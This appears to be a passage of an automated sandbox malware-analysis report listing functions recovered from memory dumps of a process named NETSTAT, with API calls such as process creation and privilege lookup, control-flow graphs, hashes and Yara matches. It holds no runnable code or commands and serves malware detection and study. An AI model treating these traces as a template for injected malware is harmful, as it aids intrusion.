                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 69ed8a49f6acb71c6b20504c501b77d67739bd39a18ae633bcea740130143dea
                                                                                                                                                                            • Instruction ID: edb590596365cb59d601ea48fef6d64a18d98d7536695e74d2656e8dc7b9bf32
                                                                                                                                                                            • Opcode Fuzzy Hash: 69ed8a49f6acb71c6b20504c501b77d67739bd39a18ae633bcea740130143dea
                                                                                                                                                                            • Instruction Fuzzy Hash: 8990023160140803E500B5985508646000587E5301F55E012A5029555EC76589916135
                                                                                                                                                                            Function 031835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: a6d692e42eb6982e621a0a9b322a4dbb20ba2777cd6c47753a4dc5cea26021cd
                                                                                                                                                                            • Instruction ID: 19e25916780332dae546bde39a5a95410ddbef9fe747774fc28f3353343033c8
                                                                                                                                                                            • Opcode Fuzzy Hash: a6d692e42eb6982e621a0a9b322a4dbb20ba2777cd6c47753a4dc5cea26021cd
                                                                                                                                                                            • Instruction Fuzzy Hash: F6900231A0550803E500B1584614706100587D5201F65D412A0429568D87958A5165A6
                                                                                                                                                                            Function 00529040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 401 529040-529082 call 52bd00 404 529088-5290d8 call 52bdd0 call 51ace0 call 524e40 401->404 405 52915c-529162 401->405 412 5290e0-5290f1 Sleep 404->412 413 5290f3-5290f9 412->413 414 529156-52915a 412->414 415 529123-529144 call 528e70 413->415 416 5290fb-529121 call 528c60 413->416 414->405 414->412 420 529149-52914c 415->420 416->420 420->414
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 005290E8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                                                                            • Opcode ID: 67dfdab9b289bf323b02092197777028d9790be4d6a7d0ccd77969d3ff99cbb0
                                                                                                                                                                            • Instruction ID: 34ff11cd1b5a4d5347a1f5a2682e745c4cb45ee62ca55c2ef3770000e5129791
                                                                                                                                                                            • Opcode Fuzzy Hash: 67dfdab9b289bf323b02092197777028d9790be4d6a7d0ccd77969d3ff99cbb0
                                                                                                                                                                            • Instruction Fuzzy Hash: A531C4B2500755BBC724DF65D889FA7BBB8BF88B00F00841DF62A6B285D730B550CBA4
                                                                                                                                                                            Function 00529036 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 421 529036-529082 call 52bd00 425 529088-5290d8 call 52bdd0 call 51ace0 call 524e40 421->425 426 52915c-529162 421->426 433 5290e0-5290f1 Sleep 425->433 434 5290f3-5290f9 433->434 435 529156-52915a 433->435 436 529123-529144 call 528e70 434->436 437 5290fb-529121 call 528c60 434->437 435->426 435->433 441 529149-52914c 436->441 437->441 441->435
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 005290E8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                                                                            • Opcode ID: 8ce54d0030ea9711474f0c820136d5c0a83954125378267c1b79227ddecc5476
                                                                                                                                                                            • Instruction ID: 4ea46d64507772fd2157c86b3641745285588ac30e7a26fa114ee8fea90340bb
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ce54d0030ea9711474f0c820136d5c0a83954125378267c1b79227ddecc5476
                                                                                                                                                                            • Instruction Fuzzy Hash: B231F2B2500356ABD714DF64D889FA7BBB8BF88700F00802DF6296B385D770A560CBA4
                                                                                                                                                                            Function 0052A662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 553 52a662-52a663 554 52a665-52a689 553->554 555 52a5fb-52a604 553->555 558 52a68f-52a69c 554->558 559 52a68a call 52af20 554->559 556 52a60c-52a621 RtlAllocateHeap 555->556 557 52a607 call 52af20 555->557 557->556 559->558
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(&ER,?,00524C9F,00524C9F,?,00524526,?,?,?,?,?,00000000,00000000,?), ref: 0052A61D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID: &ER
                                                                                                                                                                            • API String ID: 1279760036-3421137112
                                                                                                                                                                            • Opcode ID: 6dd01e8ceb169f57b029818a04b1aa70bf83ddd9ecb4785666047b33479d99ef
                                                                                                                                                                            • Instruction ID: 75e58806bbe906d6a8c0b7373359945271256770306a2243d8ab9d461a8575c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 6dd01e8ceb169f57b029818a04b1aa70bf83ddd9ecb4785666047b33479d99ef
                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF0F4BA204210BFDB20DFA8EC84ED73B94EF85354F058159F9485B782D231DD1586A1
                                                                                                                                                                            Function 0052A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 567 52a5f0-52a621 call 52af20 RtlAllocateHeap
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(&ER,?,00524C9F,00524C9F,?,00524526,?,?,?,?,?,00000000,00000000,?), ref: 0052A61D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID: &ER
                                                                                                                                                                            • API String ID: 1279760036-3421137112
                                                                                                                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                            • Instruction ID: a241158879c9b0e357d2e150b56aad4ebcef9ec9a517e4484c5395e2fa766a35
                                                                                                                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                            • Instruction Fuzzy Hash: D8E012B6200218ABDB14EF99DC45EA777ACAF88654F118558BA085B282C630F910CAB0
                                                                                                                                                                            Function 0052A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 570 52a630-52a661 call 52af20 RtlFreeHeap
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00513AF8), ref: 0052A65D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                            • String ID: .z`
                                                                                                                                                                            • API String ID: 3298025750-1441809116
                                                                                                                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                            • Instruction ID: c2abf2f684652490821c7029452c9fbbff3ec428229fc5240d917d9db8ff568f
                                                                                                                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                            • Instruction Fuzzy Hash: 2CE04FB52002146BD714DF59DC49EA777ACEF88750F014554FD0857241D630F910CAF0
                                                                                                                                                                            Function 00518308 Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0051836A
                                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0051838B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                                            • Opcode ID: 5f8e687c3c15ea3ba3d63d9975b2db71e2ad5387a854d74afaa4a0aa7d04a913
                                                                                                                                                                            • Instruction ID: 18e5d9418f7af423676c2be53cf4fad911928c401a379f30c34a1debf07ed7cf
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f8e687c3c15ea3ba3d63d9975b2db71e2ad5387a854d74afaa4a0aa7d04a913
                                                                                                                                                                            • Instruction Fuzzy Hash: 8501D832A8132977FB21A6949C07FFE7B6CBF41B50F050118FB04BA1C2E6E4690547E2
                                                                                                                                                                            Function 00518310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0051836A
                                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0051838B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                                            • Opcode ID: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                                                                                                                                                            • Instruction ID: 03ad6fea0c64a1b676f9ca2cb579bf72fec587923be6a87410abb9e8a5beee6c
                                                                                                                                                                            • Opcode Fuzzy Hash: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                                                                                                                                                            • Instruction Fuzzy Hash: 26018431A8122977FB21A6949C07FFE7B6C7F41B50F050114FB04BA1C2E694690546F6
                                                                                                                                                                            Function 0051ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0051AD52
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                                            • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                            • Instruction ID: b6523d9e1802125e340d1ce641e264aa05b3e31cb2a2f480c6ee23c4cc593091
                                                                                                                                                                            • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                            • Instruction Fuzzy Hash: B9015EB5D0020EABDF10EAA0EC46FDDBB78AF54308F104195E908A7281F670EB48CB91
                                                                                                                                                                            Function 0052A69D Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0052A6F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                                                            • Opcode ID: 8a42e367700007866616925b0abb4a460a6d6cd40b8994ab5f43c84953f99c95
                                                                                                                                                                            • Instruction ID: 28fd2d98866002d5d14503d0c8b1392ad0f6df478776952a00761d00e3511501
                                                                                                                                                                            • Opcode Fuzzy Hash: 8a42e367700007866616925b0abb4a460a6d6cd40b8994ab5f43c84953f99c95
                                                                                                                                                                            • Instruction Fuzzy Hash: 6101AFB6210118ABCB54DF89DC80EEB77ADAF8C754F158258FA0DA7245D630EC51CBA1
                                                                                                                                                                            Function 0052A6A0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0052A6F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                            • Instruction ID: 4e1d3a619e76b6a49a4a08a1f4cf73592ca4cf68604af022af5c3426e9386baa
                                                                                                                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97245D630E851CBA4
                                                                                                                                                                            Function 00529163 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0051F040,?,?,00000000), ref: 005291AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                            • Opcode ID: cb1e160dc5682795219ca4c33058d91f5dabbff0fd77d8859c1be599066a6813
                                                                                                                                                                            • Instruction ID: a112d34b442a4708ecd1f9b2f8fc6ab2043a03e978be61fd398af6e08086d0ea
                                                                                                                                                                            • Opcode Fuzzy Hash: cb1e160dc5682795219ca4c33058d91f5dabbff0fd77d8859c1be599066a6813
                                                                                                                                                                            • Instruction Fuzzy Hash: F9F0273764032036D63025199C07F63775CAFD2B10F140028FE49AB2C1C595F41182A9
                                                                                                                                                                            Function 00529170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0051F040,?,?,00000000), ref: 005291AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                            • Opcode ID: e37f0c29705da2f9f5ab9fa43d788dc7ce3eab2b62173363fdaeaa70bbfb2968
                                                                                                                                                                            • Instruction ID: b37b5b5cc5366e5aa42ddf9a65c2ad4c1976115b88bdd5bc1a67e4095d48c148
                                                                                                                                                                            • Opcode Fuzzy Hash: e37f0c29705da2f9f5ab9fa43d788dc7ce3eab2b62173363fdaeaa70bbfb2968
                                                                                                                                                                            • Instruction Fuzzy Hash: A4E06D373903143AE2206599AC02FA7B79CAFD2B20F150036FA0DEB2C1D595F80146A5
                                                                                                                                                                            Function 0052A787 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0051F1C2,0051F1C2,?,00000000,?,?), ref: 0052A7C0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                            • Opcode ID: 98dfc53656e5969b5e63ce2238b34bcc3602c05c526a2967373a56009040a14d
                                                                                                                                                                            • Instruction ID: 6e5951c62b1d1851e14c531d0a40bea24384dd70e08deba461c0801e8cc58b60
                                                                                                                                                                            • Opcode Fuzzy Hash: 98dfc53656e5969b5e63ce2238b34bcc3602c05c526a2967373a56009040a14d
                                                                                                                                                                            • Instruction Fuzzy Hash: 15E06DB56002046FCB24DF94DC85EEF3B69EF84250F158569F9099B641DA34E810CBA1
                                                                                                                                                                            Function 0052A803 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0051F1C2,0051F1C2,?,00000000,?,?), ref: 0052A7C0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                            • Opcode ID: f924cb94eadc6d257736d8bfdea27727e1d9d93b62097328727e3fbba155a19f
                                                                                                                                                                            • Instruction ID: 3dee9d6253c8eaa865abff0a3981c70a04b43b449efaadcbf719f6985c9e5eab
                                                                                                                                                                            • Opcode Fuzzy Hash: f924cb94eadc6d257736d8bfdea27727e1d9d93b62097328727e3fbba155a19f
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BE0267A1082800BD746FF78E8C14A6BFA0EF81224314899AE4984B203D17BD11B8B84
                                                                                                                                                                            Function 0052A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0051F1C2,0051F1C2,?,00000000,?,?), ref: 0052A7C0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                            • Instruction ID: cefd4aa9800bdc65fe282250c00424115df262047f1fd7e32c5c026e183ae2aa
                                                                                                                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                            • Instruction Fuzzy Hash: 36E01AB52002186BDB10DF49DC85EE737ADAF89650F018154BA0857241D934E8108BF5
                                                                                                                                                                            Function 0051F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,00518D14,?), ref: 0051F6EB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                            • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                            • Instruction ID: 299c6c8ab5443beee5b5a92afbe959ee05103c0c54d69cbc75789f109dfd613a
                                                                                                                                                                            • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                            • Instruction Fuzzy Hash: F8D05E626503042BF610FAA89C07F66378C6B55B00F490074F948972C3D954E4004565
                                                                                                                                                                            Function 03182C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 77d44772eb835ffa292a989e0d54087c192411f4afdbadca79ed700bce5edfbc
                                                                                                                                                                            • Instruction ID: f27ec2acba99d4b6aa31178cb800758114bb26cf801e7f66b342061275760c13
                                                                                                                                                                            • Opcode Fuzzy Hash: 77d44772eb835ffa292a989e0d54087c192411f4afdbadca79ed700bce5edfbc
                                                                                                                                                                            • Instruction Fuzzy Hash: C9B09B71D019C5C7EE11F7604708717790467D5701F29C462D2034645E4739C1D1E579

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 00681715 Relevance: 56.5, APIs: 23, Strings: 9, Instructions: 460sleepmemorythreadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 0068177B
                                                                                                                                                                            • SetThreadUILanguage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000), ref: 0068178A
                                                                                                                                                                              • Part of subcall function 00686139: __iob_func.MSVCRT ref: 0068613E
                                                                                                                                                                              • Part of subcall function 00684662: fgetpos.MSVCRT ref: 00684697
                                                                                                                                                                              • Part of subcall function 00684662: _fileno.MSVCRT ref: 006846B1
                                                                                                                                                                              • Part of subcall function 00684662: _setmode.MSVCRT ref: 006846B9
                                                                                                                                                                              • Part of subcall function 00684662: fwprintf.MSVCRT ref: 006846C5
                                                                                                                                                                              • Part of subcall function 00684662: fgetpos.MSVCRT ref: 006846DE
                                                                                                                                                                              • Part of subcall function 00684662: _fileno.MSVCRT ref: 006846F8
                                                                                                                                                                              • Part of subcall function 00684662: _setmode.MSVCRT ref: 00684700
                                                                                                                                                                              • Part of subcall function 00684662: _fileno.MSVCRT ref: 00684710
                                                                                                                                                                              • Part of subcall function 00684662: _write.MSVCRT ref: 00684718
